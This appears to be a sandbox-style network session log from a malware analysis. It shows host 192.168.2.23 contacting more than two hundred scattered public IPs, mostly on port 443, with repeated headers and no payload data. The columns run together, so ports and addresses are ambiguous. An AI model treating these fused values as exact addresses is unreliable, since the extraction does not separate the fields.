                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13933192.168.2.2335728205.117.91.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13934192.168.2.234895024.17.8.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13935192.168.2.235427092.236.31.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13936192.168.2.2359468218.22.60.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13937192.168.2.234855654.205.138.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13938192.168.2.2356630212.39.119.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13939192.168.2.2340038180.120.19.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13940192.168.2.2338498185.17.221.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13941192.168.2.2346774190.194.155.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13942192.168.2.2352750196.18.151.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13943192.168.2.235475075.244.63.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13944192.168.2.234769214.85.28.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13945192.168.2.2355208185.178.21.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13946192.168.2.2360702108.215.200.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13947192.168.2.233451258.173.106.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13948192.168.2.233859263.218.171.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13949192.168.2.234341481.89.111.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13950192.168.2.23595481.153.189.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13951192.168.2.2348272181.190.252.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13952192.168.2.235875888.104.81.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13953192.168.2.2349344173.127.83.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13954192.168.2.234776268.74.146.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13955192.168.2.234504013.139.203.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13956192.168.2.234193090.1.4.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13957192.168.2.2338910154.188.16.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13958192.168.2.23560301.230.229.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13959192.168.2.2333358195.148.168.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13960192.168.2.2356098160.174.64.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13961192.168.2.2353894113.192.64.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13962192.168.2.2354706164.68.249.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13963192.168.2.234594691.126.72.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13964192.168.2.2353918216.96.230.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13965192.168.2.234236885.53.254.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13966192.168.2.2337742147.110.131.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13967192.168.2.2340842188.248.227.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13968192.168.2.2346324133.53.31.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13969192.168.2.235674697.44.165.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13970192.168.2.2344982195.248.238.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13971192.168.2.2337904163.84.233.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13972192.168.2.2355248143.208.118.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13973192.168.2.2352842194.202.221.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13974192.168.2.235143083.134.210.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13975192.168.2.2348168132.179.152.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13976192.168.2.2334884146.172.141.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13977192.168.2.234406013.45.96.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13978192.168.2.2334202213.81.240.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13979192.168.2.233725276.248.133.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13980192.168.2.233442478.163.221.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13981192.168.2.2360852117.227.216.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13982192.168.2.233901438.102.199.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13983192.168.2.236081084.82.55.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13984192.168.2.233614282.78.46.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13985192.168.2.2337434110.233.219.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13986192.168.2.2333628155.217.249.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13987192.168.2.234041497.53.36.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13988192.168.2.234668699.119.147.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13989192.168.2.2343850173.126.27.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13990192.168.2.236091438.128.149.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13991192.168.2.233351435.60.65.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13992192.168.2.236027280.205.139.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13993192.168.2.235550266.31.250.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13994192.168.2.234458051.90.63.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13995192.168.2.2339712132.185.92.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13996192.168.2.2360676192.142.169.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13997192.168.2.235159844.239.136.2148080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13998192.168.2.234147894.187.96.1218080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13999192.168.2.236081093.242.243.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14000192.168.2.2350108212.203.247.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14001192.168.2.23433369.23.202.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14002192.168.2.2353786182.33.134.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14003192.168.2.2352688136.175.228.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14004192.168.2.2354728197.135.32.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14005192.168.2.2345572192.197.74.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14006192.168.2.2353490146.143.146.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14007192.168.2.233646254.214.55.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14008192.168.2.2342278104.104.102.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14009192.168.2.2340068174.198.110.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14010192.168.2.233814820.118.116.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14011192.168.2.2345304109.115.72.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14012192.168.2.234880634.51.7.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14013192.168.2.236098017.149.189.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14014192.168.2.2357378176.117.88.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14015192.168.2.2353118176.138.45.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14016192.168.2.235181863.190.208.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14017192.168.2.234049643.77.4.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14018192.168.2.2360668194.38.140.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14019192.168.2.234486878.227.107.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14020192.168.2.2359068220.103.26.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14021192.168.2.234216220.13.79.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14022192.168.2.2341590152.239.96.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14023192.168.2.2352858219.128.69.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14024192.168.2.23374289.86.196.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14025192.168.2.23479448.228.227.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14026192.168.2.2353952123.116.235.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14027192.168.2.2332864116.251.35.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14028192.168.2.2350140221.86.240.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14029192.168.2.2340316138.243.213.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14030192.168.2.2336878108.110.114.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14031192.168.2.2360598132.168.243.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14032192.168.2.235273432.221.25.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14033192.168.2.2356016103.225.57.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14034192.168.2.235274074.197.113.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14035192.168.2.2352432100.229.201.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14036192.168.2.2353628179.73.144.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14037192.168.2.2355892143.160.228.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14038192.168.2.235950859.107.77.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14039192.168.2.2343112213.185.245.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14040192.168.2.234426692.67.66.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14041192.168.2.2341142176.142.105.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14042192.168.2.2341062120.126.189.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14043192.168.2.2342714143.48.94.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14044192.168.2.2357340220.165.143.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14045192.168.2.234483868.81.35.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14046192.168.2.2336654189.235.164.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14047192.168.2.2339838106.13.120.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14048192.168.2.235015632.138.72.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14049192.168.2.2346666208.120.156.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14050192.168.2.2343562217.194.254.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14051192.168.2.2359654119.169.237.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14052192.168.2.234318820.179.85.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14053192.168.2.2348326100.12.200.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14054192.168.2.235315474.13.98.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14055192.168.2.2334080145.63.20.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14056192.168.2.2344892132.208.94.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14057192.168.2.23492184.2.95.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14058192.168.2.2356978170.143.198.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14059192.168.2.2345098104.11.152.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14060192.168.2.23443502.75.164.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14061192.168.2.234181424.11.140.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14062192.168.2.2340410108.9.36.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14063192.168.2.2357074117.180.171.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14064192.168.2.2340016191.15.118.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14065192.168.2.236047444.210.82.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14066192.168.2.234937250.150.96.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14067192.168.2.236031274.185.254.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14068192.168.2.2334700102.247.198.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14069192.168.2.2334052147.115.67.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14070192.168.2.2336376112.31.129.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14071192.168.2.2356554112.181.100.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14072192.168.2.2358018167.64.63.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14073192.168.2.2338718171.223.77.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14074192.168.2.235035013.61.157.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14075192.168.2.2337852223.239.205.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14076192.168.2.233752282.39.34.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14077192.168.2.2349862176.128.165.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14078192.168.2.2341146167.216.162.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14079192.168.2.2345238114.50.115.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14080192.168.2.234033838.208.138.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14081192.168.2.233465836.155.32.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14082192.168.2.233484694.246.232.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14083192.168.2.2333254169.151.213.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14084192.168.2.2350048147.172.249.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14085192.168.2.2348718169.36.186.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14086192.168.2.2352404137.149.185.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14087192.168.2.2347498171.10.39.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14088192.168.2.2342776118.65.213.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14089192.168.2.235329681.102.44.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14090192.168.2.235790046.176.143.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14091192.168.2.2336106184.214.20.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14092192.168.2.235456239.84.14.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14093192.168.2.236069280.198.140.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14094192.168.2.2354230184.75.78.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14095192.168.2.233439270.211.36.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14096192.168.2.235044896.121.83.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14097192.168.2.2339592196.69.111.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14098192.168.2.2360250131.107.25.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14099192.168.2.2351014110.213.253.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14100192.168.2.2355542169.28.147.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14101192.168.2.2356998115.221.148.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14102192.168.2.235437088.221.80.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14103192.168.2.2356774122.50.153.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14104192.168.2.2339432135.42.212.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14105192.168.2.235194683.135.252.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14106192.168.2.2360154151.211.208.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14107192.168.2.2351800174.127.192.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14108192.168.2.235744253.34.206.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14109192.168.2.2353244209.18.145.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14110192.168.2.236088485.111.205.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14111192.168.2.2349014125.246.141.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14112192.168.2.235808418.36.26.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14113192.168.2.2336248125.182.33.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14114192.168.2.2337656167.255.202.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14115192.168.2.233477864.103.255.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14116192.168.2.2336582132.129.223.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14117192.168.2.2342202122.242.184.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14118192.168.2.234706024.134.45.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14119192.168.2.2338558203.165.176.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14120192.168.2.2334694159.147.198.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14121192.168.2.235503669.80.22.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14122192.168.2.233305484.46.185.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14123192.168.2.234403459.113.82.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14124192.168.2.2359262108.66.18.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14125192.168.2.2339038195.176.127.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14126192.168.2.2334196202.65.174.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14127192.168.2.2353788161.22.7.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14128192.168.2.2360438161.211.248.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14129192.168.2.234227224.151.150.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14130192.168.2.2342088197.204.149.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14131192.168.2.23444082.21.109.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14132192.168.2.234005278.230.240.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14133192.168.2.2360044160.208.208.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14134192.168.2.2350282103.232.62.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14135192.168.2.2344354216.190.64.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14136192.168.2.234757848.103.217.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14137192.168.2.2354832222.43.13.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14138192.168.2.233892432.86.159.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14139192.168.2.2341776176.48.154.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14140192.168.2.233325286.204.30.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14141192.168.2.2357080151.78.231.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14142192.168.2.233489054.15.120.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14143192.168.2.2340286129.96.181.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14144192.168.2.236019277.64.16.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14145192.168.2.23405644.232.140.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14146192.168.2.2346200179.141.40.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14147192.168.2.2344664172.136.178.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14148192.168.2.2345382197.151.99.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14149192.168.2.2339272115.53.29.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14150192.168.2.2344596150.194.204.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14151192.168.2.233463272.173.148.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14152192.168.2.234229475.85.229.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14153192.168.2.235732275.119.47.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
